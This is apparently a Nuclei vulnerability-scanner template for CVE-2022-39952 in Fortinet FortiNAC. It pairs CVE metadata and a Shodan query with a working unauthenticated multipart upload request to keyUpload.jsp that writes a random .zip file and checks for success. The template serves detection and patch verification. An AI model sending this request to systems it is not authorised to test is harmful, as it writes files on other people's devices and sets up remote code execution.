id: CVE-2022-39952

info:
  name: FortiNAC Unauthenticated Arbitrary File Write
  author: dwisiswant0
  severity: critical
  description: |
    A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
  reference:
    - https://fortiguard.com/psirt/FG-IR-22-300
    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
    - https://github.com/horizon3ai/CVE-2022-39952
  remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-39952
    cwe-id: CWE-610
  metadata:
    shodan-query: title:"FortiNAC"
    verified: "true"
  tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive

variables:
  boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"

requests:
  - method: POST
    path:
      - "{{BaseURL}}/configWizard/keyUpload.jsp"
    headers:
      Content-Type: "multipart/form-data; boundary={{boundaryId}}"
    body: |
      --{{boundaryId}}
      Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"

      {{randstr}}
      --{{boundaryId}}--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "zipUploadSuccess"
          - "SuccessfulUpload"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200